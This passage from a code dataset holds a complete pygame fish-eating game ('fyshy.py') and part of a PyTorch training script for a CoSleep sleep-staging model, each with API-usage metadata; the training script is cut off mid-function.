"configuration.admin.ConfigurationParentAdmin", "line_number": 80, "usage_type": "call"}, {"api_name": "configuration.models.Configuration", "line_number": 80, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 80, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 80, "usage_type": "name"}, {"api_name": "test_app.models.SubChildConfiguration", "line_number": 83, "usage_type": "name"}, {"api_name": "configuration.admin.ConfigurationAdmin", "line_number": 83, "usage_type": "name"}, {"api_name": "test_app.models.EmptyConfiguration", "line_number": 84, "usage_type": "name"}, {"api_name": "configuration.admin.ConfigurationAdmin", "line_number": 84, "usage_type": "name"}, {"api_name": "test_app.models.AdminStringConfiguration", "line_number": 85, "usage_type": "name"}, {"api_name": "test_app.models.CustomAdmin", "line_number": 85, "usage_type": "name"}, {"api_name": "test_app.models.AdminModelConfiguration", "line_number": 86, "usage_type": "name"}, {"api_name": "test_app.models.CustomAdmin", "line_number": 86, "usage_type": "name"}, {"api_name": "django.test.TestCase", "line_number": 90, "usage_type": "name"}, {"api_name": "configuration.templatetags.configuration.get_configuration", "line_number": 93, "usage_type": "call"}, {"api_name": "configuration.templatetags.configuration.get_configuration", "line_number": 97, "usage_type": "call"}, {"api_name": "configuration.templatetags.configuration.get_configuration", "line_number": 102, "usage_type": "call"}, {"api_name": "configuration.templatetags.configuration.get_configuration", "line_number": 107, "usage_type": "call"}, {"api_name": "configuration.templatetags.configuration.get_configuration", "line_number": 110, "usage_type": "call"}, {"api_name": "test_app.models.EmptyConfiguration", "line_number": 111, "usage_type": "argument"}]} +{"seq_id": "284193103", "text": "import itertools as it\nimport os\nimport random\nimport sys\n\nos.environ['PYGAME_HIDE_SUPPORT_PROMPT'] = 'hide'\n\nimport pygame\n\nWINDOW_WIDTH = 640\nWINDOW_HEIGHT = 480\n\nSCORE_HEIGHT_OFFSET = 32\nSCORE_FONT_SIZE = 24\nEND_SPLASH_FONT_SIZE = 36\nEND_SPLASH_PLAYER_OFFSET = 100\n\nWIN_FLASHES = 5\nWIN_FLASH_DURATION = 500 # ms\nLOSE_SCREEN_DURATION = 2000 # ms\n\nFPS = 30\n\nBLACK = (0, 0, 0)\nXKCD_CRIMSON = (140, 0, 15)\nXKCD_BABY_BLUE = (162, 207, 254)\nXKCD_CERULEAN = (4, 133, 209)\nBG_COLOR = XKCD_BABY_BLUE\nINVERT_BG_COLOR = XKCD_CERULEAN\nLOSE_SCREEN_COLOR = XKCD_CRIMSON\n\nIWH_PALETTE_0 = (202, 82, 89)\nIWH_PALETTE_1 = (201, 126, 62)\nIWH_PALETTE_2 = (152, 150, 62)\nIWH_PALETTE_3 = (103, 178, 70)\nIWH_PALETTE_4 = ( 79, 166, 124)\nIWH_PALETTE_5 = ( 86, 167, 216)\nIWH_PALETTE_6 = (117, 120, 196)\nIWH_PALETTE_7 = (143, 97, 210)\n\nFISH_COLOR_0 = IWH_PALETTE_1\nFISH_COLOR_1 = IWH_PALETTE_1\nFISH_COLOR_2 = IWH_PALETTE_3\nFISH_COLOR_3 = IWH_PALETTE_3\nFISH_COLOR_4 = IWH_PALETTE_5\nFISH_COLOR_5 = IWH_PALETTE_5\nFISH_COLOR_6 = IWH_PALETTE_7\nFISH_COLOR_7 = IWH_PALETTE_7\n\nKEY_DX2DY2 = {pygame.K_UP: (0, -1),\n pygame.K_DOWN: (0, 1),\n pygame.K_LEFT: (-1, 0),\n pygame.K_RIGHT: (1, 0)}\n\rLEFT = -1\nRIGHT = 1\r\r\n# gameplay constant parameters\n\nINITIAL_DIRECTION = LEFT\nINITIAL_X = WINDOW_WIDTH // 2\nINITIAL_Y = WINDOW_HEIGHT // 2\n\nPLAYER_MAX_SPEED = 3\nPLAYER_ACCELERATION = 1.5\nPLAYER_SPEED_EPSILON = 0.2\nENEMY_SPEED_RANGE = (2, 5)\n\nMAX_ENEMY_FISH = 16\nALLOWED_OVERLAP = 0.8\nENEMY_SIZES_COLORS = ((0.25, FISH_COLOR_0),\n (0.5, FISH_COLOR_1),\n (0.75, FISH_COLOR_2),\n (1.25, FISH_COLOR_3),\n (1.75, FISH_COLOR_4),\n (2.25, FISH_COLOR_5),\n (3.25, FISH_COLOR_6),\n (4.5, FISH_COLOR_7))\nSIZE_UP_THRESHOLDS = {4: 1.5, 8: 2, 16: 3, 32: 4}\nBASE_SCORE = 100\nWIN_SIZE = 32\n\n# icons\n\nWINDOW_ICON_IMG = 'imgs/fish_window_icon.png'\nPLAYER_FISH_IMG = 'imgs/fish.png'\nPLAYER_FISH_WIGGLE_IMG = 'imgs/fish_tail_wiggle.png'\nPLAYER_FISH_EAT_IMGS = ['imgs/fish_chomp_1.png',\n 'imgs/fish_chomp_2.png',\n 'imgs/fish_chomp_3.png',\n 'imgs/fish_chomp_2.png',\n 'imgs/fish_chomp_1.png']\nENEMY_FISH_IMG = 'imgs/enemy_fish_white.png'\nENEMY_FISH_WIGGLE_IMG = 'imgs/enemy_fish_tail_wiggle_white.png'\nDEAD_FISH_IMG = 'imgs/fish_dead.png'\n\nENEMY_FRAME_STRETCH = 3\n\nclass Fish:\n def __init__(self,\n icons,\n eat_frames,\n x=INITIAL_X,\n y=INITIAL_Y,\n direction=INITIAL_DIRECTION,\n max_speed=PLAYER_MAX_SPEED,\n acceleration=PLAYER_ACCELERATION):\n self.direction = direction\n self.x = x\n self.y = y\n self.dx = 0\n self.dy = 0\n self.acceleration = acceleration\n self.base_icons = icons\n self.base_eat_frames = eat_frames\n self.base_width, self.base_height = icons[0].get_rect().size\n self.set_icons(icons, eat_frames)\n self.max_speed = max_speed\n self.impulses = {key: False for key in KEY_DX2DY2}\n self.fish_eaten = 0\n self.score = 0\n self.eat_animation = None\r\n\n def set_icons(self, swim, eat):\n flip_swim = [pygame.transform.flip(icon, True, False) for icon in swim]\n flip_eat = [pygame.transform.flip(icon, True, False) for icon in eat]\n self.icons = swim if self.direction == LEFT else flip_swim\n self.flipped_icons = flip_swim if self.direction == LEFT else swim\n self.eat_frames = eat if self.direction == LEFT else flip_eat\n self.flipped_eat_frames = flip_eat if self.direction == LEFT else eat\n self.width, self.height = swim[0].get_rect().size\n self.half_width = self.width // 2\n self.half_height = self.height // 2\n self.curr_icon_idx = 0\r\r @property\n def tail_x(self):\n return self.x - (self.half_width * self.direction)\n\n @property\n def curr_icon(self):\n if self.eat_animation is None:\n return self.icons[self.curr_icon_idx]\n else:\n return self.eat_frames[self.eat_animation]\r\r\n @property\n def top_left(self):\n return (round(self.x - self.half_width),\n round(self.y - self.half_height))\n\n @property\n def hitbox(self):\n return (self.x - self.half_width * ALLOWED_OVERLAP,\n self.x + self.half_width * ALLOWED_OVERLAP,\n self.y - self.half_height * ALLOWED_OVERLAP,\n self.y + self.half_height * ALLOWED_OVERLAP)\r\r\n def update_location(self):\n dx2 = sum(KEY_DX2DY2[key][0] * self.acceleration\n for key, pressed in self.impulses.items() if pressed)\n dy2 = sum(KEY_DX2DY2[key][1] * self.acceleration\n for key, pressed in self.impulses.items() if pressed)\n drag_x = self.dx * abs(self.dx) / 30\n drag_y = self.dy * abs(self.dy) / 30\n self.dx = max(min((self.dx + dx2 - drag_x), self.max_speed),\n -self.max_speed)\n if abs(self.dx) < PLAYER_SPEED_EPSILON:\n self.dx = 0\n self.dy = max(min((self.dy + dy2 - drag_y), self.max_speed),\n -self.max_speed)\n if abs(self.dy) < PLAYER_SPEED_EPSILON:\n self.dy = 0\n self.x = max(min((self.x + self.dx), WINDOW_WIDTH), 0)\n self.y = max(min((self.y + self.dy), WINDOW_HEIGHT), 0)\n if ((dx2 > 0 and self.direction == LEFT) or\n (dx2 < 0 and self.direction == RIGHT)):\n self.direction = LEFT if self.direction == RIGHT else RIGHT\n self.icons, self.flipped_icons = self.flipped_icons, self.icons\n self.eat_frames, self.flipped_eat_frames = (self.flipped_eat_frames,\n self.eat_frames)\n if dx2:\n self.curr_icon_idx = (self.curr_icon_idx + 1) % len(self.icons)\n if self.eat_animation is not None:\n self.eat_animation += 1\n if self.eat_animation == len(self.eat_frames):\n self.eat_animation = None\n\n def eat(self, fish):\n self.fish_eaten += 1\n self.score += fish.score\n self.eat_animation = 0\n if self.fish_eaten in SIZE_UP_THRESHOLDS:\n size_up_proportion = SIZE_UP_THRESHOLDS[self.fish_eaten]\n new_width = int(self.base_width * size_up_proportion)\n new_height = int(self.base_height * size_up_proportion)\n new_dims = (new_width, new_height)\n new_icons = [pygame.transform.smoothscale(icon, new_dims)\n for icon in self.base_icons]\n new_eat_frames = [pygame.transform.smoothscale(icon, new_dims)\n for icon in self.base_eat_frames]\n self.set_icons(new_icons, new_eat_frames)\n\rclass EnemyFish(Fish):\n def __init__(self, icons, eat_frames, x, y, direction, max_speed, size):\n icons = list(it.chain.from_iterable(it.repeat(icon, ENEMY_FRAME_STRETCH)\n for icon in icons))\n super().__init__(icons, [], x, y, direction, max_speed)\n self.size = size\n self.score = size * BASE_SCORE\n self.curr_frame_idx = random.randrange(len(icons))\n\n def update_location(self):\n self.x = self.x + self.direction * self.max_speed\n self.curr_icon_idx = (self.curr_icon_idx + 1) % len(self.icons)\n\rdef overlap(first, second):\n return (first[0] <= second[1] and first[1] >= second[0])\r\r\ndef hitbox_overlap(first, second):\n first_left, first_right, first_bottom, first_top = first.hitbox\n second_left, second_right, second_bottom, second_top = second.hitbox\n return (overlap((first_left, first_right), (second_left, second_right)) and\n overlap((first_bottom, first_top), (second_bottom, second_top)))\n\rdef overlap_edges(fish):\n return ((fish.direction == LEFT and fish.tail_x <= 0) or\n (fish.direction == RIGHT and fish.tail_x >= WINDOW_WIDTH))\r\r\ndef handle_collisions(player_fish, other_fish):\n to_remove = []\n for fish_idx, fish in enumerate(other_fish):\n if hitbox_overlap(player_fish, fish):\n if fish.width >= player_fish.width:\n return False\n else:\n to_remove.append(fish_idx)\n player_fish.eat(fish)\n elif overlap_edges(fish):\n to_remove.append(fish_idx)\n for fish_idx in reversed(to_remove):\n other_fish.pop(fish_idx)\n return True\n\rdef draw_pond(display_surface, player_fish, other_fish):\n display_surface.fill(BG_COLOR)\n max_x = display_surface.get_width()\n for fish in other_fish + [player_fish]:\n display_surface.blit(fish.curr_icon, fish.top_left)\n\ndef draw_score(display_surface, player_fish):\n font = pygame.font.Font(None, SCORE_FONT_SIZE)\n text_surface = font.render(str(int(player_fish.score)), True, BLACK)\n loc = (display_surface.get_width() // 2, SCORE_HEIGHT_OFFSET)\n display_surface.blit(text_surface, text_surface.get_rect(center=loc))\n\rdef win_screen(display_surface, player_fish):\n curr_color, next_color = BG_COLOR, INVERT_BG_COLOR\n for _ in range(WIN_FLASHES):\n curr_color, next_color = next_color, curr_color\n display_surface.fill(curr_color)\n player_fish.x = display_surface.get_width() // 2\n player_fish.y = (display_surface.get_height() // 2 -\n END_SPLASH_PLAYER_OFFSET)\n display_surface.blit(player_fish.curr_icon, player_fish.top_left)\n font = pygame.font.Font(None, END_SPLASH_FONT_SIZE)\n text_surface = font.render('You won!', True, next_color)\n loc = (display_surface.get_width() // 2,\n display_surface.get_height() // 2)\n display_surface.blit(text_surface, text_surface.get_rect(center=loc))\n pygame.display.update()\n pygame.time.wait(WIN_FLASH_DURATION)\n\ndef lose_screen(display_surface):\n display_surface.fill(LOSE_SCREEN_COLOR)\n x = display_surface.get_width() // 2\n y = display_surface.get_height() // 2 - END_SPLASH_PLAYER_OFFSET\n dead_fish = Fish([pygame.image.load(DEAD_FISH_IMG)], [], x, y)\n display_surface.blit(dead_fish.curr_icon, dead_fish.top_left)\n font = pygame.font.Font(None, END_SPLASH_FONT_SIZE)\n text_surface = font.render('You got eaten', True, BLACK)\n loc = (display_surface.get_width() // 2, display_surface.get_height() // 2)\n display_surface.blit(text_surface, text_surface.get_rect(center=loc))\n pygame.display.update()\n pygame.time.wait(LOSE_SCREEN_DURATION)\n\ndef spawn_enemy_fish(prototypes):\n size, color = random.choice(ENEMY_SIZES_COLORS)\n width, height = (int(size * dim) for dim in prototypes[0].get_rect().size)\n direction = random.choice((LEFT, RIGHT))\n x = WINDOW_WIDTH if direction == LEFT else 0\n x -= direction * width // 2\n y = random.randrange(WINDOW_HEIGHT)\n speed = random.uniform(*ENEMY_SPEED_RANGE)\n icons = [icon.copy() for icon in prototypes]\n for icon in icons:\n icon.fill(color, special_flags=pygame.BLEND_MULT)\n icons = [pygame.transform.smoothscale(icon, (width, height))\n for icon in icons]\n return EnemyFish(icons, [], x, y, direction, speed, size)\n\ndef repopulate_enemy_fish(enemy_fish, prototypes, count=MAX_ENEMY_FISH):\n return (enemy_fish + [spawn_enemy_fish(prototypes)\n for _ in range(len(enemy_fish), count)])\n\ndef main():\n pygame.init()\n display_surface = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))\n pygame.display.set_icon(pygame.image.load(WINDOW_ICON_IMG))\n player_prototypes = [pygame.image.load(PLAYER_FISH_IMG),\n pygame.image.load(PLAYER_FISH_WIGGLE_IMG)]\n player_eating = [pygame.image.load(file) for file in PLAYER_FISH_EAT_IMGS]\n enemy_prototypes = [pygame.image.load(ENEMY_FISH_IMG),\n pygame.image.load(ENEMY_FISH_WIGGLE_IMG)]\n player_fish = Fish(player_prototypes, player_eating)\n enemy_fish = repopulate_enemy_fish([], enemy_prototypes)\n pygame.display.set_caption('Fyshy')\n frame_clock = pygame.time.Clock()\n while True:\n if player_fish.fish_eaten >= WIN_SIZE:\n win_screen(display_surface, player_fish)\n player_fish = Fish(player_prototypes, player_eating)\n enemy_fish = repopulate_enemy_fish([], enemy_prototypes)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n if event.key in KEY_DX2DY2:\n player_fish.impulses[event.key] = True\n elif event.type == pygame.KEYUP:\n if event.key in KEY_DX2DY2:\n player_fish.impulses[event.key] = False\n for fish in enemy_fish + [player_fish]:\n fish.update_location()\n survived = handle_collisions(player_fish, enemy_fish)\n if not survived:\n lose_screen(display_surface)\n player_fish = Fish(player_prototypes, player_eating)\n enemy_fish = []\n enemy_fish = repopulate_enemy_fish(enemy_fish, enemy_prototypes)\n draw_pond(display_surface, player_fish, enemy_fish)\n draw_score(display_surface, player_fish)\n pygame.display.update()\n frame_clock.tick(FPS)\n\nif __name__ == '__main__':\n main()\n", "sub_path": "fyshy.py", "file_name": "fyshy.py", "file_ext": "py", "file_size_in_byte": 13528, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "os.environ", "line_number": 6, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 50, "usage_type": "attribute"}, {"api_name": "pygame.K_DOWN", "line_number": 51, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 52, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 53, "usage_type": "attribute"}, {"api_name": "pygame.transform.flip", "line_number": 125, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 125, "usage_type": "attribute"}, {"api_name": "pygame.transform.flip", "line_number": 126, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 126, "usage_type": "attribute"}, {"api_name": "pygame.transform.smoothscale", "line_number": 198, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 198, "usage_type": "attribute"}, {"api_name": "pygame.transform.smoothscale", "line_number": 200, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 200, "usage_type": "attribute"}, {"api_name": "itertools.chain.from_iterable", "line_number": 206, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 206, "usage_type": "attribute"}, {"api_name": "itertools.repeat", "line_number": 206, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 211, "usage_type": "call"}, {"api_name": "pygame.font.Font", "line_number": 252, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 252, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 266, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 266, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 271, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 271, "usage_type": "attribute"}, {"api_name": "pygame.time.wait", "line_number": 272, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 272, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 278, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 278, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 280, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 280, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 284, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 284, "usage_type": "attribute"}, {"api_name": "pygame.time.wait", "line_number": 285, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 285, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 288, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 290, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 293, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 294, "usage_type": "call"}, {"api_name": "pygame.BLEND_MULT", "line_number": 297, "usage_type": "attribute"}, {"api_name": "pygame.transform.smoothscale", "line_number": 298, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 298, "usage_type": "attribute"}, {"api_name": "pygame.init", "line_number": 307, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 308, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 308, "usage_type": "attribute"}, {"api_name": "pygame.display.set_icon", "line_number": 309, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 309, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 309, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 309, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 310, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 310, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 311, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 311, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 312, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 312, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 313, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 313, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 314, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 314, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 317, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 317, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 318, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 318, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 324, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 324, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 325, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 326, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 327, "usage_type": "call"}, {"api_name": "pygame.KEYDOWN", "line_number": 328, "usage_type": "attribute"}, {"api_name": "pygame.KEYUP", "line_number": 331, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 344, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 344, "usage_type": "attribute"}]} +{"seq_id": "501510962", "text": "\"\"\"\n@Time : 2021/5/15 16:01\n@Author : Xiao Qinfeng\n@Email : qfxiao@bjtu.edu.cn\n@File : main_cosleep.py\n@Software: PyCharm\n@Desc : \n\"\"\"\nimport argparse\nimport copy\nimport os\nimport pickle\nimport random\nimport shutil\nimport sys\nimport warnings\nfrom datetime import datetime\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torchvision.transforms as TF\nimport wandb\nfrom sklearn.model_selection import KFold\nfrom torch.utils.data import DataLoader, SubsetRandomSampler\nfrom tqdm.std import tqdm\n\nfrom cosleep.data import SleepDataset, SleepDatasetImg, TwoDataset\nfrom cosleep.model import CoSleep, DPCFusionClassifier\nfrom cosleep.utils import get_performance, logits_accuracy, mask_accuracy, MultiNCELoss\n\n\ndef setup_seed(seed):\n warnings.warn(f'You have chosen to seed ({seed}) training. This will turn on the CUDNN deterministic setting, '\n f'which can slow down your training considerably! You may see unexpected behavior when restarting '\n f'from checkpoints.')\n\n torch.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n np.random.seed(seed)\n random.seed(seed)\n torch.backends.cudnn.deterministic = True\n\n\ndef parse_args(verbose=True):\n parser = argparse.ArgumentParser()\n\n # Dataset & saving & loading\n parser.add_argument('--data-name', type=str, default='sleepedf', choices=['sleepedf', 'isruc'])\n parser.add_argument('--data-path-v1', type=str, required=True)\n parser.add_argument('--data-path-v2', type=str, required=True)\n parser.add_argument('--load-path-v1', type=str, required=True)\n parser.add_argument('--load-path-v2', type=str, required=True)\n parser.add_argument('--channels-v1', type=int, default=2)\n parser.add_argument('--channels-v2', type=int, default=6)\n parser.add_argument('--time-len-v1', type=int, default=3000)\n parser.add_argument('--time-len-v2', type=int, default=30)\n parser.add_argument('--freq-len-v1', type=int, default=None)\n parser.add_argument('--freq-len-v2', type=int, default=100)\n parser.add_argument('--num-epoch', type=int, default=10, help='The number of epochs in a sequence')\n parser.add_argument('--pred-steps', type=int, default=5)\n parser.add_argument('--save-path', type=str, default='cache/tmp')\n parser.add_argument('--save-interval', type=int, default=10)\n parser.add_argument('--classes', type=int, default=5)\n parser.add_argument('--preprocessing', choices=['none', 'quantile', 'standard'], default='standard')\n\n # Model\n parser.add_argument('--network', type=str, default='r1d', choices=['r1d', 'r2d'])\n parser.add_argument('--second-network', type=str, default='r2d', choices=['r1d', 'r2d'])\n parser.add_argument('--feature-dim', type=int, default=128)\n\n # Training\n parser.add_argument('--resume', action='store_true')\n parser.add_argument('--devices', type=int, nargs='+', default=None)\n parser.add_argument('--fold', type=int, default=0)\n parser.add_argument('--kfold', type=int, default=10)\n parser.add_argument('--iter', dest='iteration', type=int, default=5)\n parser.add_argument('--pretrain-epochs', type=int, default=10)\n parser.add_argument('--finetune-epochs', type=int, default=10)\n parser.add_argument('--finetune-ratio', type=float, default=0.1)\n parser.add_argument('--finetune-mode', type=str, default='freeze', choices=['freeze', 'smaller', 'all'])\n parser.add_argument('--cos', action='store_true', help='use cosine lr schedule')\n parser.add_argument('--lr-schedule', type=int, nargs='*', default=[120, 160])\n parser.add_argument('--batch-size', type=int, default=32)\n parser.add_argument('--num-workers', type=int, default=4)\n\n # Optimization\n parser.add_argument('--optimizer', type=str, default='adamw', choices=['sgd', 'adam', 'adamw'])\n parser.add_argument('--lr', type=float, default=1e-3)\n parser.add_argument('--wd', type=float, default=1e-3)\n parser.add_argument('--momentum', type=float, default=0.9, help='Only valid for SGD optimizer')\n\n parser.add_argument('--mem-k', default=2048, type=int,\n help='queue size; number of negative keys (default: 65536)')\n parser.add_argument('--mem-m', default=0.999, type=float,\n help='moco momentum of updating key encoder (default: 0.999)')\n parser.add_argument('--temperature', type=float, default=0.07)\n parser.add_argument('--iteration', type=int, default=5)\n parser.add_argument('--lam', type=float, default=0.1)\n parser.add_argument('--dynamic-lam', action='store_true')\n parser.add_argument('--lower-bound', type=float, default=0.1)\n parser.add_argument('--upper-bound', type=float, default=0.9)\n parser.add_argument('--single-view', action='store_true')\n parser.add_argument('--num-prop', type=int, default=5)\n\n # Misc\n parser.add_argument('--tensorboard', action='store_true')\n parser.add_argument('--disp-interval', type=int, default=20)\n parser.add_argument('--wandb', action='store_true')\n parser.add_argument('--seed', type=int, default=None)\n\n args_parsed = parser.parse_args()\n\n if verbose:\n message = ''\n message += '-------------------------------- Args ------------------------------\\n'\n for k, v in sorted(vars(args_parsed).items()):\n comment = ''\n default = parser.get_default(k)\n if v != default:\n comment = '\\t[default: %s]' % str(default)\n message += '{:>35}: {:<30}{}\\n'.format(str(k), str(v), comment)\n message += '-------------------------------- End ----------------------------------'\n print(message)\n\n return args_parsed\n\n\ndef pretrain(model, train_dataset_v1, train_dataset_v2, device, run_id, it, args):\n if args.optimizer == 'sgd':\n optimizer = optim.SGD(model.parameters(), lr=args.lr, weight_decay=args.wd, momentum=args.momentum)\n elif args.optimizer == 'adam':\n optimizer = optim.Adam(model.parameters(), lr=args.lr, weight_decay=args.wd)\n elif args.optimizer == 'adamw':\n optimizer = optim.AdamW(model.parameters(), weight_decay=args.wd, lr=args.lr)\n else:\n raise ValueError('Invalid optimizer!')\n\n assert len(train_dataset_v1) == len(train_dataset_v2), f'{len(train_dataset_v1)} - {len(train_dataset_v2)}'\n dataset = TwoDataset(train_dataset_v1, train_dataset_v2)\n\n data_loader = DataLoader(dataset, batch_size=args.batch_size, num_workers=args.num_workers,\n shuffle=True, pin_memory=True, drop_last=True)\n\n criterion = MultiNCELoss(reduction='mean').cuda(device)\n\n if args.dynamic_lam:\n assert args.lam <= 0.5\n\n model.train()\n for epoch in range(args.pretrain_epochs):\n losses = []\n accuracies = []\n\n if args.dynamic_lam:\n model.lam = args.lam + epoch / args.pretrain_epochs * (0.5 - args.lam)\n\n with tqdm(data_loader, desc=f'EPOCH [{epoch + 1}/{args.pretrain_epochs}]',\n total=len(train_dataset_v1) // args.batch_size) as progress_bar:\n for x, _, idx1, f, __, idx2 in progress_bar:\n assert (idx1 == idx2).all()\n x = x.cuda(device, non_blocking=True)\n f = f.cuda(device, non_blocking=True)\n idx = idx1.cuda(device, non_blocking=True)\n\n logits, targets = model(x, f, idx)\n\n loss = criterion(logits, targets)\n\n acc = mask_accuracy(logits, targets, topk=(1,))[0]\n accuracies.append(acc)\n\n # if random.random() < 0.9:\n # # because model has been pretrained with infoNCE,\n # # in this stage, self-similarity is already very high,\n # # randomly mask out the self-similarity for optimization efficiency,\n # targets_clone = targets.clone()\n # targets_sum = targets.sum(-1)\n # targets_clone[targets_sum != 1, 0] = 0 # mask out self-similarity\n # loss = criterion(logits, targets_clone)\n # else:\n # loss = criterion(logits, targets)\n\n # loss = criterion(logits, targets)\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n losses.append(loss.item())\n\n progress_bar.set_postfix(\n {'Loss': np.mean(losses), 'Acc': np.mean(accuracies)})\n if args.wandb:\n wandb.log({f'pretrain_loss_it{it}': np.mean(loss), f'pretrain_acc_it{it}': np.mean(accuracies)})\n\n\ndef finetune(classifier, dataset, device, it, args):\n params = []\n if args.finetune_mode == 'freeze':\n print('[INFO] Finetune classifier only for the last layer...')\n for name, param in classifier.named_parameters():\n if 'encoder' in name or 'agg' in name or 'sampler' in name:\n param.requires_grad = False\n else:\n params.append({'params': param})\n elif args.finetune_mode == 'smaller':\n print('[INFO] Finetune the whole classifier where the backbone have a smaller lr...')\n for name, param in classifier.named_parameters():\n if 'encoder' in name or 'agg' in name or 'sampler' in name:\n params.append({'params': param, 'lr': args.lr / 10})\n else:\n params.append({'params': param})\n else:\n print('[INFO] Finetune the whole classifier...')\n for name, param in classifier.named_parameters():\n params.append({'params': param})\n\n if args.optimizer == 'sgd':\n optimizer = optim.SGD(params, lr=args.lr, weight_decay=args.wd, momentum=args.momentum)\n elif args.optimizer == 'adam':\n optimizer = optim.Adam(params, lr=args.lr, weight_decay=args.wd, betas=(0.9, 0.98), eps=1e-09,\n amsgrad=True)\n elif args.optimizer == 'adamw':\n optimizer = optim.AdamW(params, weight_decay=args.wd, lr=args.lr)\n else:\n raise ValueError('Invalid optimizer!')\n\n criterion = nn.CrossEntropyLoss().cuda(device)\n\n sampled_indices = np.arange(len(dataset))\n np.random.shuffle(sampled_indices)\n sampled_indices = sampled_indices[:int(len(sampled_indices) * args.finetune_ratio)]\n data_loader = DataLoader(dataset, batch_size=args.batch_size, num_workers=args.num_workers,\n shuffle=False, pin_memory=True, drop_last=True,\n sampler=SubsetRandomSampler(sampled_indices))\n\n classifier.train()\n for epoch in range(args.finetune_epochs):\n losses = []\n accuracies = []\n with tqdm(data_loader, desc=f'EPOCH [{epoch + 1}/{args.finetune_epochs}]') as progress_bar:\n for x1, y, _, x2, __, ___ in progress_bar:\n x1, y, x2 = x1.cuda(device, non_blocking=True), y.cuda(device, non_blocking=True), x2.cuda(device,\n non_blocking=True)\n\n out = classifier(x1, x2)\n # out = out.view(-1, out.shape[-1])\n\n loss = criterion(out, y.view(-1))\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n losses.append(loss.item())\n accuracies.append(logits_accuracy(out, y.view(-1), topk=(1,))[0])\n\n progress_bar.set_postfix({'Loss': np.mean(losses), 'Acc': np.mean(accuracies)})\n if args.wandb:\n if it is None:\n wandb.log(\n {'finetune_acc_it': np.mean(accuracies), 'finetune_loss': np.mean(losses)})\n else:\n wandb.log({f'finetune_acc_it{it}': np.mean(accuracies), f'finetune_loss_it{it}': np.mean(losses)})\n\n\ndef evaluate(classifier, dataset, device, args):\n data_loader = DataLoader(dataset, batch_size=args.batch_size, num_workers=args.num_workers,\n shuffle=True, pin_memory=True, drop_last=True)\n\n targets = []\n scores = []\n\n classifier.eval()\n with torch.no_grad():\n for x1, y, x2, _ in data_loader:\n x1, x2 = x1.cuda(device, non_blocking=True), x2.cuda(device, non_blocking=True)\n\n out = classifier(x1, x2)\n scores.append(out.cpu().numpy())\n targets.append(y.view(-1).numpy())\n\n scores = np.concatenate(scores, axis=0)\n targets = np.concatenate(targets, axis=0)\n\n return scores, targets\n\n\ndef test(state_dict, dataset_v1, dataset_v2, test_dataset_v1, test_dataset_v2, reverse, device, it, args):\n # Finetuning\n if args.finetune_mode == 'freeze':\n use_dropout = False\n use_l2_norm = True\n use_final_bn = True\n else:\n use_dropout = True\n use_l2_norm = False\n use_final_bn = False\n\n if not reverse:\n classifier = 